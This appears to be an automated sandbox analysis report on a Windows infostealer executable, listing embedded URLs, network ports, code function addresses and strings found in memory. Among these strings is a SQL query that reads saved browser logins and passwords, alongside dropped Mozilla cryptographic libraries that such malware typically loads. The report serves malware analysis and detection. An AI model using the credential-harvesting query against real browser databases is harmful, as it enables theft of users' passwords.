              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0A
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0C
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0N
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://ocsp.digicert.com0X
              Source: chromecache_79.3.dr | String found in binary or memory: http://www.broofa.com
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: http://www.digicert.com/CPS0
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2015932243.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015215696.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: http://www.sqlite.org/copyright.html.
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: chromecache_77.3.dr | String found in binary or memory: https://accounts.google.com/o/oauth2/auth
              Source: chromecache_77.3.dr | String found in binary or memory: https://accounts.google.com/o/oauth2/postmessageRelay
              Source: chromecache_77.3.dr, chromecache_79.3.dr | String found in binary or memory: https://apis.google.com
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr | String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr | String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: chromecache_77.3.dr | String found in binary or memory: https://clients6.google.com
              Source: chromecache_77.3.dr | String found in binary or memory: https://content.googleapis.com
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr | String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: chromecache_77.3.dr | String found in binary or memory: https://domains.google.com/suggest/flow
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: chromecache_79.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
              Source: chromecache_79.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
              Source: chromecache_79.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
              Source: chromecache_79.3.dr | String found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
              Source: DBFHDBGIEBFIIDGCBFBK.0.dr | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: https://mozilla.org0/
              Source: chromecache_79.3.dr | String found in binary or memory: https://play.google.com/log?format=json&hasfast=true
              Source: chromecache_77.3.dr | String found in binary or memory: https://plus.google.com
              Source: chromecache_77.3.dr | String found in binary or memory: https://plus.googleapis.com
              Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://support.mozilla.org
              Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp, 0vsAIy0DhJ.exe, 00000000.00000003.1833434443.000000000585E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp, 0vsAIy0DhJ.exe, 00000000.00000003.1833434443.000000000585E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000594000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
              Source: chromecache_77.3.dr | String found in binary or memory: https://workspace.google.com/:session_prefix:marketplace/appfinder?usegapi=1
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
              Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr | String found in binary or memory: https://www.digicert.com/CPS0
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://www.ecosia.org/newtab/
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2011664540.000000000B992000.00000004.00000020.00020000.00000000.sdmp, DBFHDBGIEBFIIDGCBFBK.0.dr | String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
              Source: FIDAFCAF.0.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: chromecache_77.3.dr | String found in binary or memory: https://www.googleapis.com/auth/plus.me
              Source: chromecache_77.3.dr | String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
              Source: chromecache_79.3.dr | String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
              Source: chromecache_79.3.dr | String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
              Source: chromecache_79.3.dr | String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
              Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://www.mozilla.org
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/
              Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/about/t.exe
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/
              Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
              Source: 0vsAIy0DhJ.exe, 00000000.00000003.1957005080.000000000BBD3000.00000004.00000020.00020000.00000000.sdmp, KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
              Source: KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/
              Source: 0vsAIy0DhJ.exe, 00000000.00000003.1957005080.000000000BBD3000.00000004.00000020.00020000.00000000.sdmp, KKFHJJDHJEGHJKECBGCFHDBFIE.0.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2003720246.0000000000677000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknown | Network traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknown | Network traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49750 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknown | Network traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknown | Network traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49755 -> 443

              System Summary

              Source: 0vsAIy0DhJ.exe | Static PE information: section name:
              Source: 0vsAIy0DhJ.exe | Static PE information: section name: .idata
              Source: 0vsAIy0DhJ.exe | Static PE information: section name:
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C6B62C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy | 0_2_6C6B62C0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5D05700_2_6C5D0570
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6785500_2_6C678550
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5925600_2_6C592560
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5BE5F00_2_6C5BE5F0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5FA5E00_2_6C5FA5E0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5245B00_2_6C5245B0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C58C6500_2_6C58C650
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5546D00_2_6C5546D0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C58E6E00_2_6C58E6E0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5CE6E00_2_6C5CE6E0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5B07000_2_6C5B0700
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C55A7D00_2_6C55A7D0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C57E0700_2_6C57E070
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5F80100_2_6C5F8010
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5FC0000_2_6C5FC000
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5280900_2_6C528090
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C60C0B00_2_6C60C0B0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5400B00_2_6C5400B0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6440900_2_6C644090
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5981400_2_6C598140
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6141300_2_6C614130
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5A61300_2_6C5A6130
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5301E00_2_6C5301E0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5C82500_2_6C5C8250
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5B82600_2_6C5B8260
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6082200_2_6C608220
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5FA2100_2_6C5FA210
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6B62C00_2_6C6B62C0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6022A00_2_6C6022A0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5FE2B00_2_6C5FE2B0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C64C3600_2_6C64C360
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5383400_2_6C538340
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6723700_2_6C672370
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5323700_2_6C532370
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5C63700_2_6C5C6370
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5A23200_2_6C5A2320
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5843E00_2_6C5843E0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C58E3B00_2_6C58E3B0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5623A00_2_6C5623A0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C63DC600_2_6C63DC60
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C533C400_2_6C533C40
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C659C400_2_6C659C40
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C541C300_2_6C541C30
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C66DCD00_2_6C66DCD0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5F1CE00_2_6C5F1CE0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C649CB00_2_6C649CB0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5CFC800_2_6C5CFC80
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C593D000_2_6C593D00
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C601DC00_2_6C601DC0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C523D800_2_6C523D80
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C679D900_2_6C679D90
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6B5E600_2_6C6B5E60
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C68BE700_2_6C68BE70
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C63FE400_2_6C63FE40
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C63DE100_2_6C63DE10
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C553EC00_2_6C553EC0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C687F200_2_6C687F20
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C633F300_2_6C633F30
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C525F300_2_6C525F30
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C565F200_2_6C565F20
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C64DFC00_2_6C64DFC0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6B3FC00_2_6C6B3FC0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5DBFF00_2_6C5DBFF0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C551F900_2_6C551F90
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C6038400_2_6C603840
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C58D8100_2_6C58D810
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C60F8F00_2_6C60F8F0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C68B8F00_2_6C68B8F0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5CF8C00_2_6C5CF8C0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C53D8E00_2_6C53D8E0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5638E00_2_6C5638E0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5AF9600_2_6C5AF960
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5ED9600_2_6C5ED960
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C67F9000_2_6C67F900
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5E59200_2_6C5E5920
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5699D00_2_6C5699D0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5C99C00_2_6C5C99C0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5959F00_2_6C5959F0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5C79F00_2_6C5C79F0
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exeCode function: 0_2_6C5419800_2_6C541980
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: String function: 6C6BDAE0 appears 63 times
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: String function: 6C559B10 appears 86 times
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: String function: 6C6B09D0 appears 278 times
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: String function: 6C553620 appears 74 times
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: String function: 6C6BD930 appears 51 times
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: String function: 6C58C5E0 appears 35 times
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: String function: 6C669F30 appears 33 times
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2016019504.000000006F902000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: OriginalFilenamemozglue.dll0 vs 0vsAIy0DhJ.exe
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2015727723.000000006C705000.00000002.00000001.01000000.00000009.sdmp | Binary or memory string: OriginalFilenamenss3.dll0 vs 0vsAIy0DhJ.exe
              Source: 0vsAIy0DhJ.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 0vsAIy0DhJ.exe | Static PE information: Section: ncgncztn ZLIB complexity 0.9949645623473748
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@17/36@6/7
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Code function: 0_2_6C590300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\8QHLVUSM.htm
              Source: C:\Users\user\Desktop\0vsAIy0DhJ.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2005346128.000000000102E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SELECT origin_url, username_value, password_value FROM logins;
              Source: 0vsAIy0DhJ.exe, 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
              Source: 0vsAIy0DhJ.exe, 00000000.00000002.2008760591.0000000005963000.00000004.00000020.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015070712.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 0vsAIy0DhJ.exe, 00000000.00000002.2015541853.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
              Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
